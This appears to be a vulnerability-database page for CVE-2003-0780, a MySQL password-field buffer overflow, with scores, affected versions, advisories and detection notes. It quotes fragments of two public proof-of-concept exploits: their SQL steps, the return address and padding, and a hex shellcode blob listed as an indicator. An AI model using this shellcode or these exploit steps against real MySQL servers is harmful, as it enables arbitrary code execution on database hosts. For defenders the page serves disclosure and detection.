CVE-2003-0780
published 2003-09-22CVE-2003-0780: Buffer overflow in get_salt_from_password from sql_acl.cc for MySQL 4.0.14 and earlier, and 3.23.x, allows attackers with ALTER TABLE privileges to execute…
PriorityP353critical9CVSS 2.0
AVNACLAuSCCICAC
EXPLOIT
EPSS
74.58%
99.4th percentile
Buffer overflow in get_salt_from_password from sql_acl.cc for MySQL 4.0.14 and earlier, and 3.23.x, allows attackers with ALTER TABLE privileges to execute arbitrary code via a long Password field.
Affected
65 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| conectiva | linux | — | — |
| conectiva | linux | — | — |
| conectiva | linux | — | — |
| mysql | mysql | — | — |
| oracle | mysql | — | — |
| oracle | mysql | — | — |
| oracle | mysql | — | — |
| oracle | mysql | — | — |
| oracle | mysql | — | — |
| oracle | mysql | — | — |
| oracle | mysql | — | — |
| oracle | mysql | — | — |
| oracle | mysql | — | — |
| oracle | mysql | — | — |
| oracle | mysql | — | — |
| oracle | mysql | — | — |
| oracle | mysql | — | — |
| oracle | mysql | — | — |
| oracle | mysql | — | — |
| oracle | mysql | — | — |
| oracle | mysql | — | — |
| oracle | mysql | — | — |
| oracle | mysql | — | — |
| oracle | mysql | — | — |
| oracle | mysql | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x11\x00\x00\x00\x03\x66\x6C\x75\x73\x68\x20\x70\x72\x69\x76\x69\x6C\x65\x67\x65\x73
bytes↗
db31c03102b0c931c08580cd314b1b74cd07b0d2b0c03180 8980cd40b1c931c3cd25b009cd01b080cd17b08050c03180e3895040a2b0c931e0b180cde883c888940d0f70ac031c789e2894c4057525050244c8d51b3db3104cd66b00af8835980800575010974493ac031d2e2cdc38940b1fb8980493fb003e24180cd6e6851f86868732f69622f2f6851e389706c692d5251e28931e18953b0c031d29080cd0b
- →Exploit requires ALTER TABLE privileges on the mysql.user table; monitor for ALTER TABLE statements changing the Password column type to LONGTEXT on the mysql.user table. ↗
- →Exploit triggers a buffer overflow via an oversized Password field (>16 characters) followed by FLUSH PRIVILEGES; monitor for UPDATE statements on mysql.user setting Password to strings far exceeding 16 characters. ↗
- →Exploit connects to MySQL on TCP port 3306 and sends a raw FLUSH PRIVILEGES packet with the byte sequence \x11\x00\x00\x00\x03 followed by 'flush privileges'; detect this raw packet pattern on port 3306. ↗
- →Exploit uses a fixed JMP *EAX return address 0x42125b2b targeting glibc-2.2.93-5; presence of this address in network traffic to port 3306 is a strong indicator of exploitation. ↗
- →Exploit uses a PAD value of 19*4*2 (152 bytes) to align the overflow buffer; oversized password payloads of this structure sent to MySQL should be flagged. ↗
- →The vulnerable function is get_salt_from_password in sql_acl.cc; stack traces or crash dumps referencing this function indicate exploitation attempts. ↗
- ·Exploitation requires the attacker to already possess global ALTER TABLE privileges on the MySQL server (i.e., administrative access); this is not an unauthenticated remote exploit. ↗
- ·The proof-of-concept exploit targets glibc-2.2.93-5 with a hardcoded return address (0x42125b2b); exploitation against other glibc versions would require a different return address. ↗
- ·Affected versions are MySQL 4.0.14 and earlier, and all 3.23.x releases; systems running later versions are not affected by this specific CVE. ↗
CVSS provenance
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
vendor_redhat9.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
security flaw
vendor_redhat·2003-09-10·CVSS 9.0
CVE-2003-0780 [CRITICAL] security flaw
security flaw
Buffer overflow in get_salt_from_password from sql_acl.cc for MySQL 4.0.14 and earlier, and 3.23.x, allows attackers with ALTER TABLE privileges to execute arbitrary code via a long Password field.
GHSA
GHSA-fq6h-5jh8-rmxv: Buffer overflow in get_salt_from_password from sql_acl
ghsa_unreviewed·2022-04-29
CVE-2003-0780 [HIGH] GHSA-fq6h-5jh8-rmxv: Buffer overflow in get_salt_from_password from sql_acl
Buffer overflow in get_salt_from_password from sql_acl.cc for MySQL 4.0.14 and earlier, and 3.23.x, allows attackers with ALTER TABLE privileges to execute arbitrary code via a long Password field.
No detection rules found.
Exploit-DB
MySQL 3.23.x/4.0.x - Remote Buffer Overflow
exploitdb·2003-09-14
CVE-2003-0780 MySQL 3.23.x/4.0.x - Remote Buffer Overflow
MySQL 3.23.x/4.0.x - Remote Buffer Overflow
---
/* Mysql 3.23.x/4.0.x remote exploit
* proof of concept
* using jmp *eax
* bkbll (bkbll cnhonker.net,bkbll tom.com) 2003/09/12
* compile:gcc -o mysql mysql.c -L/usr/lib/mysql -lmysqlclient
* DO NOT DISTRUBITED IT
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PAD 19*4*2
#define JMPADDR 0x42125b2b
#define ROOTUSER "root"
#define PORT 3306
#define MYDB "mysql"
#define ALTCOLUMSQL "ALTER TABLE user CHANGE COLUMN Password Password LONGTEXT"
#define LISTUSERSQL "SELECT user FROM mysql.user WHERE user!='root' OR user='root LIMIT 1,1'"
#define FLUSHSQL "\x11\x00\x00\x00\x03\x66\x6C\x75\x73\x68\x20\x70\x72\x69\x76\x69\x6C\x65\x67\x65\x73"
#define BUF 1024
MYSQL *conn;
char NOP[]="90";
/*
char shellcode
Exploit-DB
MySQL 3.23.x/4.0.x - Password Handler Buffer Overflow
exploitdb·2003-09-10
CVE-2003-0780 MySQL 3.23.x/4.0.x - Password Handler Buffer Overflow
MySQL 3.23.x/4.0.x - Password Handler Buffer Overflow
---
source: https://www.securityfocus.com/bid/8590/info
MySQL server has been reported prone to a buffer overflow vulnerability when handling user passwords of excessive size.
The issue presents itself, due to a lack of sufficient bounds checking performed when processing MySQL user passwords. A password greater that 16 characters may overrun the bounds of a reserved buffer in memory and corrupt adjacent memory. An attacker with global administrative privileges on an affected MySQL server may potentially exploit this condition to have arbitrary supplied instructions executed in the context of the MySQL server.
> USE mysql;
> ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
> UPDATE User SET Password =
'1234567812345678123
Bugzilla
CVE-2003-0780 security flaw
bugzilla·2018-08-16·CVSS 9.0
CVE-2003-0780 [CRITICAL] CVE-2003-0780 security flaw
CVE-2003-0780 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Buffer overflow in get_salt_from_password from sql_acl.cc for MySQL 4.0.14 and earlier, and 3.23.x, allows attackers with ALTER TABLE privileges to execute arbitrary code via a long Password field.
Bugzilla
CAN-2003-0780 MySQL password field buffer overflow
bugzilla·2003-09-16
[MEDIUM] CAN-2003-0780 MySQL password field buffer overflow
CAN-2003-0780 MySQL password field buffer overflow
Frank Denis reported a bug in unpatched versions of MySQL versions prior to
3.0.58. Passwords of MySQL users are stored in the Password field of the
user table, part of the mysql database. By filling a Password field with a
value wider than 16 characters, a buffer overflow can occur. This could
allow an attacker who has the ability to modify the user table to execute
arbitrary code as the MySQL user. The Common Vulnerabilities and Exposures
project (cve.mitre.org) has assigned the name CAN-2003-0780 to this issue.
Discussion:
We will address this by moving to MySQL 3.23.58 (released yesterday).
---
RHSA-2003:282 in progress
---
An errata has been issued which should help the problem described in this bug report.
This report is there
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000743http://lists.grok.org.uk/pipermail/full-disclosure/2003-September/009819.htmlhttp://marc.info/?l=bugtraq&m=106364207129993&w=2http://marc.info/?l=bugtraq&m=106381424420775&w=2http://secunia.com/advisories/9709http://www.debian.org/security/2003/dsa-381http://www.kb.cert.org/vuls/id/516492http://www.mandriva.com/security/advisories?name=MDKSA-2003:094http://www.redhat.com/support/errata/RHSA-2003-281.htmlhttp://www.redhat.com/support/errata/RHSA-2003-282.htmlhttp://www.securityfocus.com/archive/1/337012http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000743http://lists.grok.org.uk/pipermail/full-disclosure/2003-September/009819.htmlhttp://marc.info/?l=bugtraq&m=106364207129993&w=2http://marc.info/?l=bugtraq&m=106381424420775&w=2http://secunia.com/advisories/9709http://www.debian.org/security/2003/dsa-381http://www.kb.cert.org/vuls/id/516492http://www.mandriva.com/security/advisories?name=MDKSA-2003:094http://www.redhat.com/support/errata/RHSA-2003-281.htmlhttp://www.redhat.com/support/errata/RHSA-2003-282.htmlhttp://www.securityfocus.com/archive/1/337012
2003-09-22
Published